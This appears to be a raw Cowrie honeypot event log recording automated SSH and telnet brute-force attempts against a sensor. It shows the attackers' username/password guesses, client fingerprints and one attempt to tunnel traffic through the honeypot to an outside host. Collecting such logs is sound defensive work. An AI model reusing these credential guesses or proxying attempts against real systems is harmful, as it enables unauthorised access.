{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:55:18.076589Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:55:18.078000Z","src_ip":"212.227.235.229","session":"c72e067fe4bd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50584,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d78291d1798","protocol":"ssh","message":"New connection: 217.72.205.35:50584 (1.2.3.4:22) [session: 2d78291d1798]","sensor":"my-vps","timestamp":"2025-08-28T19:55:19.131395Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:55:19.132541Z","src_ip":"217.72.205.35","session":"2d78291d1798"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57726,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a5a9061fbc6","protocol":"telnet","message":"New connection: 212.227.125.160:57726 (1.2.3.4:23) [session: 1a5a9061fbc6]","sensor":"my-vps","timestamp":"2025-08-28T19:56:19.568882Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:56:19.654264Z","src_ip":"212.227.125.160","session":"1a5a9061fbc6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:56:19.675982Z","src_ip":"212.227.125.160","session":"1a5a9061fbc6"}
{"eventid":"cowrie.session.connect","src_ip":"196.57.217.2","src_port":36984,"dst_ip":"1.2.3.4","dst_port":22,"session":"972e0068c2de","protocol":"ssh","message":"New connection: 196.57.217.2:36984 (1.2.3.4:22) [session: 972e0068c2de]","sensor":"my-vps","timestamp":"2025-08-28T19:56:33.075243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:56:33.076167Z","src_ip":"196.57.217.2","session":"972e0068c2de"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T19:56:33.109034Z","src_ip":"196.57.217.2","session":"972e0068c2de"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:56:41.200888Z","src_ip":"196.57.217.2","session":"972e0068c2de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18686,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa143e02ff3f","protocol":"ssh","message":"New connection: 212.227.235.229:18686 (1.2.3.4:22) [session: fa143e02ff3f]","sensor":"my-vps","timestamp":"2025-08-28T19:58:14.524468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:58:14.525450Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:58:14.629726Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26111979","message":"login attempt [admin/26111979] failed","sensor":"my-vps","timestamp":"2025-08-28T19:58:15.131822Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26091980","message":"login attempt [admin/26091980] failed","sensor":"my-vps","timestamp":"2025-08-28T19:58:16.240063Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26071993","message":"login attempt [admin/26071993] failed","sensor":"my-vps","timestamp":"2025-08-28T19:58:17.347167Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26061988","message":"login attempt [admin/26061988] failed","sensor":"my-vps","timestamp":"2025-08-28T19:58:18.455537Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26061984","message":"login attempt [admin/26061984] failed","sensor":"my-vps","timestamp":"2025-08-28T19:58:19.562332Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:58:20.669437Z","src_ip":"212.227.235.229","session":"fa143e02ff3f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:59:19.716226Z","src_ip":"212.227.125.160","session":"1a5a9061fbc6"}
{"eventid":"cowrie.session.closed","duration":180.15330123901367,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:59:19.722242Z","src_ip":"212.227.125.160","session":"1a5a9061fbc6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55320,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b4b0223d98a","protocol":"ssh","message":"New connection: 217.72.205.35:55320 (1.2.3.4:22) [session: 1b4b0223d98a]","sensor":"my-vps","timestamp":"2025-08-28T20:01:54.790820Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:01:54.791913Z","src_ip":"217.72.205.35","session":"1b4b0223d98a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34996,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fa8060430ef","protocol":"telnet","message":"New connection: 212.227.235.229:34996 (1.2.3.4:23) [session: 9fa8060430ef]","sensor":"my-vps","timestamp":"2025-08-28T20:02:07.090763Z"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":46322,"dst_ip":"1.2.3.4","dst_port":23,"session":"b18e1037fcd8","protocol":"telnet","message":"New connection: 79.124.8.120:46322 (1.2.3.4:23) [session: b18e1037fcd8]","sensor":"my-vps","timestamp":"2025-08-28T20:02:09.898301Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:02:09.939370Z","src_ip":"79.124.8.120","session":"b18e1037fcd8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:02:09.959317Z","src_ip":"79.124.8.120","session":"b18e1037fcd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63213,"dst_ip":"1.2.3.4","dst_port":22,"session":"cebc30993e2b","protocol":"ssh","message":"New connection: 212.227.235.229:63213 (1.2.3.4:22) [session: cebc30993e2b]","sensor":"my-vps","timestamp":"2025-08-28T20:02:32.827658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:02:32.913101Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:02:33.045915Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33166,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f6b516d1216","protocol":"ssh","message":"New connection: 212.227.235.229:33166 (1.2.3.4:22) [session: 1f6b516d1216]","sensor":"my-vps","timestamp":"2025-08-28T20:02:33.445422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:02:33.446342Z","src_ip":"212.227.235.229","session":"1f6b516d1216"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:02:33.584863Z","src_ip":"212.227.235.229","session":"1f6b516d1216"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden","message":"login attempt [jayden/jayden] failed","sensor":"my-vps","timestamp":"2025-08-28T20:02:33.631519Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T20:02:34.191080Z","src_ip":"212.227.235.229","session":"1f6b516d1216"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden1","message":"login attempt [jayden/jayden1] failed","sensor":"my-vps","timestamp":"2025-08-28T20:02:34.766896Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:02:35.319229Z","src_ip":"212.227.235.229","session":"1f6b516d1216"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden123","message":"login attempt [jayden/jayden123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:02:35.902274Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden1234","message":"login attempt [jayden/jayden1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:02:37.037637Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden12345","message":"login attempt [jayden/jayden12345] failed","sensor":"my-vps","timestamp":"2025-08-28T20:02:38.171833Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:02:39.306311Z","src_ip":"212.227.235.229","session":"cebc30993e2b"}
{"eventid":"cowrie.login.success","username":"root","password":"ZXCVB","message":"login attempt [root/ZXCVB] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:03:08.172161Z","src_ip":"212.227.235.229","session":"9fa8060430ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:03:08.190879Z","src_ip":"212.227.235.229","session":"9fa8060430ef"}
{"eventid":"cowrie.session.connect","src_ip":"134.122.12.159","src_port":46234,"dst_ip":"1.2.3.4","dst_port":22,"session":"20580e118d9a","protocol":"ssh","message":"New connection: 134.122.12.159:46234 (1.2.3.4:22) [session: 20580e118d9a]","sensor":"my-vps","timestamp":"2025-08-28T20:03:08.298368Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T20:03:08.299697Z","src_ip":"134.122.12.159","session":"20580e118d9a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:03:08.301134Z","src_ip":"134.122.12.159","session":"20580e118d9a"}
{"eventid":"cowrie.session.connect","src_ip":"134.122.12.159","src_port":46246,"dst_ip":"1.2.3.4","dst_port":22,"session":"68f863e13153","protocol":"ssh","message":"New connection: 134.122.12.159:46246 (1.2.3.4:22) [session: 68f863e13153]","sensor":"my-vps","timestamp":"2025-08-28T20:03:08.488706Z"}
{"eventid":"cowrie.client.version","version":"GET /favicon.ico HTTP/1.1","message":"Remote SSH version: GET /favicon.ico HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T20:03:08.489888Z","src_ip":"134.122.12.159","session":"68f863e13153"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:03:08.490971Z","src_ip":"134.122.12.159","session":"68f863e13153"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34083,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd1a8bab9dbb","protocol":"ssh","message":"New connection: 212.227.235.229:34083 (1.2.3.4:22) [session: bd1a8bab9dbb]","sensor":"my-vps","timestamp":"2025-08-28T20:03:09.362836Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:03:09.364071Z","src_ip":"212.227.235.229","session":"bd1a8bab9dbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34386,"dst_ip":"1.2.3.4","dst_port":22,"session":"67148e48e487","protocol":"ssh","message":"New connection: 212.227.235.229:34386 (1.2.3.4:22) [session: 67148e48e487]","sensor":"my-vps","timestamp":"2025-08-28T20:03:09.548202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:03:09.549244Z","src_ip":"212.227.235.229","session":"67148e48e487"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T20:03:09.709677Z","src_ip":"212.227.235.229","session":"67148e48e487"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:03:10.189891Z","src_ip":"212.227.235.229","session":"67148e48e487"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T20:03:10.350747Z","session":"67148e48e487"}
{"eventid":"cowrie.session.connect","src_ip":"195.96.138.89","src_port":58348,"dst_ip":"1.2.3.4","dst_port":22,"session":"484b189ce30f","protocol":"ssh","message":"New connection: 195.96.138.89:58348 (1.2.3.4:22) [session: 484b189ce30f]","sensor":"my-vps","timestamp":"2025-08-28T20:03:25.655266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Renci.SshNet.SshClient.0.0.1","message":"Remote SSH version: SSH-2.0-Renci.SshNet.SshClient.0.0.1","sensor":"my-vps","timestamp":"2025-08-28T20:03:25.656985Z","src_ip":"195.96.138.89","session":"484b189ce30f"}
{"eventid":"cowrie.client.kex","hassh":"d7ef57bfcf13ebeb41532c4ed0094994","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,blowfish-cbc,twofish-cbc,twofish192-cbc,twofish128-cbc,twofish256-cbc,arcfour,arcfour128,arcfour256,cast128-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-512-96,hmac-sha2-256-96,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-md5-96-etm@openssh.com;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","blowfish-cbc","twofish-cbc","twofish192-cbc","twofish128-cbc","twofish256-cbc","arcfour","arcfour128","arcfour256","cast128-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-512-96","hmac-sha2-256-96","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-md5-96-etm@openssh.com"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: d7ef57bfcf13ebeb41532c4ed0094994","sensor":"my-vps","timestamp":"2025-08-28T20:03:25.680711Z","src_ip":"195.96.138.89","session":"484b189ce30f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Grandstream1","message":"login attempt [admin/Grandstream1] failed","sensor":"my-vps","timestamp":"2025-08-28T20:03:25.754989Z","src_ip":"195.96.138.89","session":"484b189ce30f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:03:26.780984Z","src_ip":"195.96.138.89","session":"484b189ce30f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40048,"dst_ip":"1.2.3.4","dst_port":23,"session":"39a8d41a177d","protocol":"telnet","message":"New connection: 212.227.125.160:40048 (1.2.3.4:23) [session: 39a8d41a177d]","sensor":"my-vps","timestamp":"2025-08-28T20:03:55.964243Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:04:19.557739Z","src_ip":"212.227.235.229","session":"67148e48e487"}
{"eventid":"cowrie.session.closed","duration":30.804765224456787,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:04:26.768932Z","src_ip":"212.227.125.160","session":"39a8d41a177d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36041,"dst_ip":"1.2.3.4","dst_port":23,"session":"6aaa3516c20e","protocol":"telnet","message":"New connection: 212.227.125.160:36041 (1.2.3.4:23) [session: 6aaa3516c20e]","sensor":"my-vps","timestamp":"2025-08-28T20:04:54.817267Z"}
{"eventid":"cowrie.session.closed","duration":12.952323198318481,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:05:07.769493Z","src_ip":"212.227.125.160","session":"6aaa3516c20e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56644,"dst_ip":"1.2.3.4","dst_port":23,"session":"a14aae14380d","protocol":"telnet","message":"New connection: 212.227.125.160:56644 (1.2.3.4:23) [session: a14aae14380d]","sensor":"my-vps","timestamp":"2025-08-28T20:05:09.461982Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:05:09.544881Z","src_ip":"212.227.125.160","session":"a14aae14380d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:05:09.562279Z","src_ip":"212.227.125.160","session":"a14aae14380d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T20:05:09.563513Z","src_ip":"212.227.125.160","session":"a14aae14380d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T20:05:09.564381Z","src_ip":"212.227.125.160","session":"a14aae14380d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:05:09.960982Z","src_ip":"79.124.8.120","session":"b18e1037fcd8"}
